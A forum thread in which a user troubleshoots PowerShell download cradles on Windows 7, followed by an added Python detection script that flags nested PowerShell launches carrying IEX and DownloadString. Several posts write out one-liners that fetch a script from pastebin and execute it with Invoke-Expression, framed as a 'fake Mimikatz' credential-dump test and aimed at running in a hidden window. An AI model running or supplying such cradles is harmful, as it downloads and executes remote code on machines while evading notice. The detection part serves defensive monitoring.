gueni32

Run Powershell with command options and Invoke-Expression breaks my powershell.exe [Windows 7]


Hi everybody!

So I'm simply trying some download cradles in PowerShell on a Windows 7. I wanted to download this test PowerShell script (fake Mimikatz): https://pastebin.com/FvASwLVQ that runs the calculator and prints some random information, and I wanted to run the main function. So I ran the following command:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds"

And immediately after that nothing happens, I'm still on the same PowerShell and I can't open a new PowerShell console by any means unless I restart my computer.

The thing is I tested the same command with other scripts and I get the same results...

The IEX command without the "powershell -c" works perfectly, and the first command works on every Windows 10! So does anyone know the problem? Thanks!

PSVersion : 5.1.14409.1005


Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff, like when using WMI to launch processes with command line arguments.

Thanks for your answer @PoSHMagiC0de, but I tried with a simple command that has the same pattern as the first command but without the script:

$var = "notepad"

powershell -c "IEX $var;notepad"

And it worked perfectly! So I don't understand...


Wait, you are launching PowerShell from within PowerShell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently.

If run from the command line that will work. But if within PowerShell then the below will need to be done.

Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`""

But if you are already in PowerShell, I do not see the need for the above.

I tried to start a PowerShell within a PowerShell because I wanted to test if I can launch the download cradle in a hidden window. That works on Windows 10 but not on Windows 7, so that's why I tested this weird inception PowerShell command.

Thanks for your command with "Start-Process", I will test it tomorrow!

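From the defender's side, the thread describes exactly the shape a detection rule looks for: powershell.exe spawning another powershell.exe whose command line carries IEX, New-Object Net.WebClient and DownloadString, optionally with a hidden window. The following is an added example, not code posted by anyone in this thread. It runs over constructed process-creation records modelled on Windows Security event 4688 (the field names NewProcessName, ParentProcessName and CommandLine are assumptions about how a collector would present them, and the sample values are made up except for the pastebin URL quoted above). On Windows 7 the command line only appears in 4688 when command-line auditing is enabled, or when Sysmon event 1 is used instead; the logic below is the same either way.

```python
"""Flag nested PowerShell launches that carry a download cradle.

Added example for this thread, not code from any poster. Input records are
constructed to resemble Windows Security event 4688 / Sysmon event 1 fields;
the field names are an assumption about the collector's output.
"""
import re

# Indicators taken from the cradle discussed in the thread. PowerShell is
# case-insensitive, so every pattern is too.
CRADLE_PATTERNS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def is_powershell(image):
    """True if the image path ends in a PowerShell host binary."""
    return image.lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES


def cradle_indicators(cmdline):
    """Names of the cradle patterns present in a command line."""
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(cmdline)]


def classify(event):
    """Return (severity, sorted indicator list) for one process-creation record.

    'high'   : code is fetched (DownloadString) and evaluated (IEX) in one line
    'medium' : some indicators present, e.g. IEX alone or nested PowerShell
    'none'   : nothing of interest
    """
    indicators = cradle_indicators(event.get("CommandLine", ""))
    if is_powershell(event.get("ParentProcessName", "")) and is_powershell(
        event.get("NewProcessName", "")
    ):
        # PowerShell launching PowerShell: the pattern the thread is about.
        indicators.append("nested_powershell")
    indicators.sort()
    if "downloadstring" in indicators and "iex" in indicators:
        return "high", indicators
    if indicators:
        return "medium", indicators
    return "none", indicators


def triage(events):
    """Return [(severity, indicators, command line)] for every flagged event, in order."""
    results = []
    for ev in events:
        severity, indicators = classify(ev)
        if severity != "none":
            results.append((severity, indicators, ev.get("CommandLine", "")))
    return results


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {   # the thread's command, run from inside an existing PowerShell
        "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString("
                       "'https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds\"",
    },
    {   # hidden-window cradle launched from Explorer (constructed URL)
        "ParentProcessName": r"C:\Windows\explorer.exe",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/script.ps1')\"",
    },
    {   # the poster's harmless control test: nested, IEX, but no download
        "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c \"IEX $var;notepad\"",
    },
    {   # ordinary process start, nothing to flag
        "ParentProcessName": r"C:\Windows\explorer.exe",
        "NewProcessName": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
    },
]

if __name__ == "__main__":
    for severity, indicators, cmd in triage(SAMPLE_EVENTS):
        print(f"[{severity:6}] {', '.join(indicators):55} {cmd[:60]}")
```

The nested-PowerShell indicator alone is only medium: administrators do start child shells legitimately, as the first reply notes, so it is the combination with fetch-and-evaluate on the same command line that earns a high rating.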
